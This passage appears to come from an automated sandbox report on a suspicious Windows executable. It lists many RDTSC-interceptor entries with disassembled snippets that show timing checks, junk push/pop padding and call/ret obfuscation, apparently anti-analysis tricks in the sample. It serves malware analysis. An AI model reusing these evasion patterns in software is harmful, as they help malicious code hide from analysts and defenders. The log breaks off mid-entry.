              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C2270 second address: 2C22DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0CB0C50341h 0x00000009 jmp 00007F0CB0C50345h 0x0000000e popad 0x0000000f jmp 00007F0CB0C50349h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007F0CB0C5033Ch 0x0000001c jnc 00007F0CB0C50342h 0x00000022 push eax 0x00000023 push edx 0x00000024 jp 00007F0CB0C50336h 0x0000002a push edi 0x0000002b pop edi 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C22DF second address: 2C22E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C2445 second address: 2C2449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C2AA5 second address: 2C2AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F0CB0E1B265h 0x0000000b je 00007F0CB0E1B256h 0x00000011 jc 00007F0CB0E1B256h 0x00000017 jmp 00007F0CB0E1B267h 0x0000001c popad 0x0000001d pushad 0x0000001e push esi 0x0000001f pop esi 0x00000020 jmp 00007F0CB0E1B25Ah 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 popad 0x00000029 pushad 0x0000002a pushad 0x0000002b jg 00007F0CB0E1B256h 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C2AFF second address: 2C2B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0CB0C50342h 0x0000000a push ebx 0x0000000b jmp 00007F0CB0C50343h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C2B2C second address: 2C2B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C2B35 second address: 2C2B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C2B3B second address: 2C2B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C2E4E second address: 2C2E54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C2E54 second address: 2C2E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C2E58 second address: 2C2E5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C2E5C second address: 2C2E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0CB0E1B266h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F0CB0E1B258h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C2FFF second address: 2C3012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0CB0C50336h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F0CB0C50336h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29880A second address: 298819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C3141 second address: 2C314A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C314A second address: 2C319B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Eh 0x00000007 jmp 00007F0CB0E1B269h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0CB0E1B269h 0x00000016 jng 00007F0CB0E1B25Ah 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C3A2A second address: 2C3A34 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0CB0C5033Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C3B98 second address: 2C3BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F0CB0E1B256h 0x00000013 jg 00007F0CB0E1B256h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C3EC6 second address: 2C3EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0CB0C50336h 0x0000000a jng 00007F0CB0C50336h 0x00000010 popad 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C3EDC second address: 2C3EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28E910 second address: 28E914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CAF72 second address: 2CAF7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CAF7C second address: 2CAF80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CAF80 second address: 2CAF84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CB1CD second address: 2CB1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CB1D4 second address: 2CB1D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CB1D9 second address: 2CB1F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0CB0C5033Ch 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CB1F4 second address: 2CB238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B263h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jng 00007F0CB0E1B260h 0x00000011 pushad 0x00000012 jne 00007F0CB0E1B256h 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007F0CB0E1B261h 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE2F0 second address: 2CE308 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50344h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE4AE second address: 2CE4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 ja 00007F0CB0E1B26Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE4BB second address: 2CE4D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0CB0C50342h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE60F second address: 2CE61B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F0CB0E1B256h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE61B second address: 2CE625 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE625 second address: 2CE629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE629 second address: 2CE63D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0CB0C50336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE63D second address: 2CE658 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B267h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE658 second address: 2CE673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F0CB0C50345h 0x0000000c jmp 00007F0CB0C5033Fh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE7E5 second address: 2CE7F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jp 00007F0CB0E1B256h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE7F8 second address: 2CE7FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE7FE second address: 2CE804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE804 second address: 2CE817 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE817 second address: 2CE82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0CB0E1B25Ch 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE82B second address: 2CE82F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE82F second address: 2CE846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F0CB0E1B256h 0x00000011 jc 00007F0CB0E1B256h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CEE4C second address: 2CEE50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D2C15 second address: 2D2C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0E1B265h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D2D1C second address: 2D2D22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D2D22 second address: 2D2D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D2D26 second address: 2D2D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D2D35 second address: 2D2D3A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D2DD5 second address: 2D2DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D2DDA second address: 2D2DE4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0CB0E1B25Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3385 second address: 2D339B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0CB0C5033Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D339B second address: 2D33B0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xchg eax, ebx 0x00000008 mov dword ptr [ebp+12457067h], edi 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D33B0 second address: 2D33B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D33B4 second address: 2D33B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D33B8 second address: 2D33BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D343C second address: 2D3443 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3798 second address: 2D37B2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0CB0C50336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0CB0C5033Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3844 second address: 2D3864 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F0CB0E1B25Ah 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3D70 second address: 2D3D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3D74 second address: 2D3D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3D78 second address: 2D3D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3D82 second address: 2D3D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D587A second address: 2D587E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D587E second address: 2D5884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D61DC second address: 2D61E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D7993 second address: 2D799D instructions: 0x00000000 rdtsc 0x00000002 js 00007F0CB0E1B256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D8498 second address: 2D84B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50347h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DA5D3 second address: 2DA5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DA5D9 second address: 2DA5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DAC4F second address: 2DAC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DAC53 second address: 2DACCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b mov bx, si 0x0000000e push 00000000h 0x00000010 mov ebx, dword ptr [ebp+122D3883h] 0x00000016 mov ebx, dword ptr [ebp+12469FF6h] 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F0CB0C50338h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000017h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 mov bx, ACE7h 0x0000003c xchg eax, esi 0x0000003d pushad 0x0000003e jmp 00007F0CB0C5033Ch 0x00000043 jc 00007F0CB0C5033Ch 0x00000049 jne 00007F0CB0C50336h 0x0000004f popad 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F0CB0C50340h 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DACCB second address: 2DACD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DDE4C second address: 2DDE5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0C5033Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFDCD second address: 2DFDE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFDE6 second address: 2DFDEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFDEB second address: 2DFDF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFDF1 second address: 2DFDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DBF50 second address: 2DBF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E0F56 second address: 2E0F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E0F5A second address: 2E0F6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B260h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DF052 second address: 2DF059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E0F6E second address: 2E0F73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DF059 second address: 2DF07F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50347h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F0CB0C50338h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E0F73 second address: 2E0FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0CB0E1B25Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+12449B13h] 0x00000015 push 00000000h 0x00000017 mov ebx, dword ptr [ebp+12447184h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007F0CB0E1B258h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b jg 00007F0CB0E1B258h 0x00000041 jns 00007F0CB0E1B262h 0x00000047 popad 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E0FDC second address: 2E0FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E0FE1 second address: 2E0FF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0CB0E1B263h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFFB6 second address: 2DFFBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFFBB second address: 2DFFCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0E1B25Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFFCB second address: 2DFFCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E113D second address: 2E1141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E1141 second address: 2E11D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50347h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d sub ebx, 77CDD965h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov bx, 125Dh 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 mov bx, ax 0x00000028 mov eax, dword ptr [ebp+122D11DDh] 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F0CB0C50338h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 mov bx, di 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007F0CB0C50338h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 0000001Dh 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 nop 0x00000068 push eax 0x00000069 push edx 0x0000006a push edi 0x0000006b push eax 